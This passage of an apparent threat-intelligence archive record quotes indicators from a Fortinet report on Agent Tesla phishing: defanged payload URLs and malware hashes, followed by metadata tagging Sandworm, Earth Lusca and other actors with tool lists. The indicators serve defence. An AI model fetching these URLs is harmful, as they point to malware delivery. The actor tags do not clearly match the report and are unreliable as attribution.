attacks.\r\nIOCs:\r\nURLs\r\nhxxp://www[.]j[.]mp/ais1kdoaksodjasod14\r\nhxxp://bit[.]ly/ais1kdoaksodjasod14\r\nhxxps://p8hj[.]blogspot[.]com/p/27[.]html\r\nhxxps://ia601500[.]us[.]archive[.]org/9/items/FTp-120-May12/27-1.txt\r\nhxxps://ia601500[.]us[.]archive[.]org/9/items/FTp-120-May12/27-2.txt\r\nhxxps://ia801500[.]us[.]archive[.]org/9/items/FTp-120-May12/27-3.txt\r\nhxxp://1230948%1230948@getyournewblog[.]blogspot[.]com/p/27.html\r\nhxxp://1230948%1230948@newblogset144[.]blogspot[.]com/p/27.html\r\nhxxp://1230948%1230948@firstblognew123[.]blogspot[.]com/p/27.html\r\nhxxp://1230948%1230948@papagunnakjdnmwdnwmndwm[.]blogspot[.]com/p/27.html\r\nSample SHA-256\r\n[Order Requirements and Specs.xls]\r\nF10D005B7997686E87BAEE766E5B28BE3386FE3BA9A557BD2042DCBA5414B740\r\n[Extracted new variant of Agent Tesla]\r\n6FED3E1D302B9DF7893248367ED06F8A4F5BA2D3B7547E3F49D1D00A7718A8B4\r\nReference:\r\nNew Agent Tesla Variant Spreading by Phishing\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security Subscriptions and Services portfolio.\r\nLearn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda (TAA), or about the Fortinet Network Security Expert program, Security Academy program, and Veterans program.\r\nSource: https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant"
	],
	"report_names": [
		"phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant"
	],
	"threat_actors": [
		{
			"id": "0661a292-80f3-420b-9951-a50e03c831c0",
			"created_at": "2023-01-06T13:46:38.928796Z",
			"updated_at": "2026-04-10T02:00:03.148052Z",
			"deleted_at": null,
			"main_name": "IRIDIUM",
			"aliases": [],
			"source_name": "MISPGALAXY:IRIDIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75455540-2f6e-467c-9225-8fe670e50c47",
			"created_at": "2022-10-25T16:07:23.740266Z",
			"updated_at": "2026-04-10T02:00:04.732992Z",
			"deleted_at": null,
			"main_name": "Iridium",
			"aliases": [],
			"source_name": "ETDA:Iridium",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"LazyCat",
				"Powerkatz",
				"SinoChopper",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434003,
	"ts_updated_at": 1775826714,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7a98212ea6275ca0384416efae06d8c565141267.pdf",
		"text": "https://archive.orkl.eu/7a98212ea6275ca0384416efae06d8c565141267.txt",
		"img": "https://archive.orkl.eu/7a98212ea6275ca0384416efae06d8c565141267.jpg"
	}
}